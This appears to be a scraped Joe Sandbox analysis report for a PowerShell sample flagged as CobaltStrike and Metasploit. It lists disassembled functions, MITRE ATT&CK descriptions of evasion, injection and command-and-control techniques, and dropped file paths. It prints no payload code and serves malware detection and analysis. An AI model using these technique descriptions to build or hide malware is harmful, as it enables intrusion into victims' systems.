Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: d6c75893a8b8cdba1cdccd7648c7c79805f69453ca37c984926281bf3413687d
Instruction ID: 8762e6e2ae6541d4c7c6524eaf70c560080aac858bcbb5099d5ba83032827fc6
Opcode Fuzzy Hash: d6c75893a8b8cdba1cdccd7648c7c79805f69453ca37c984926281bf3413687d
Instruction Fuzzy Hash: 1E016163D18F88C2D6018F18E8003AB7331FB6E749F259316EB8C3A565DB79D592C704

Function 00401CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

Argument domain error (DOMAIN), xrefs: 00401CE0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
Instruction ID: 8c7bf1553abe8d1c1cf5b10b417118f64097995adaaa4f0d994d3f7e231e07fb
Opcode Fuzzy Hash: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
Instruction Fuzzy Hash: ECF06D62858E8882D2029F1CE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704

Function 00401CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Partial loss of significance (PLOSS), xrefs: 00401CF0

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
Instruction ID: 5cd091db9141fe0e6e89e9efff11c316d26cc63b3b889972c32c6c159b948a40
Opcode Fuzzy Hash: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
Instruction Fuzzy Hash: C4F06262858E8882D2029F1CE4003AB7331FB5E788F245316EF8D3A555DB28D5828704

Function 00401D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

Overflow range error (OVERFLOW), xrefs: 00401D00
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
Instruction ID: c612fb770c622c5d72669c3638e63aa4b2f428d8e56e9d424d6433c91b575293
Opcode Fuzzy Hash: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
Instruction Fuzzy Hash: 6FF01D62958E8882D2029F1DE4003AB7331FB9EB99F68531AEF8D3A555DB29D5828704

Function 00401D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
Instruction ID: abe9318e7ccd880ee09ac2f980ce11207d3172f5f88a25f0641f3127fee3ffee
Opcode Fuzzy Hash: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
Instruction Fuzzy Hash: 77F06D62858E8882D2029F1DE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704

Function 00401D20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Total loss of significance (TLOSS), xrefs: 00401D20

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
Instruction ID: 7a53e470b351231260d633d6082b1e766a8645853782131be27a1b39d9499402
Opcode Fuzzy Hash: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
Instruction Fuzzy Hash: 52F01262958E8882D2029F1DE4003AB7331FB9E799F245316EF8D3A555DB39D5828704

Function 00401C78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

Argument singularity (SIGN), xrefs: 00401C78
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
Instruction ID: b6e0ecebc6e2091bb6bcdfd9ecb9f8b620cfa756c99f7cd1274eda0ebaf44184
Opcode Fuzzy Hash: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
Instruction Fuzzy Hash: CBF03062954F8882D202DF2DE4003AB7331FB5EB9DF649316EF8D3A555DB29D5828704

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to lowest risk score due to lack of data" ] }
Date: unknown

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report fabd6ab15a0540d197f1ceaa312308b8.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Threatname: Metasploit

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tmpE651.exe_ddb34dd491c5bc1b4e5cb3d770867358ec95a0f8_5d970c58_974b5306-7cba-4072-9f27-fcb724be1b3c\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER227.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER247.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e14rfb2a.scy.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0futhai.pka.ps1

C:\Users\user\AppData\Local\Temp\tmpE651.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00IMOGVFM67MO8HITX26.temp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Windows Analysis Report
fabd6ab15a0540d197f1ceaa312308b8.ps1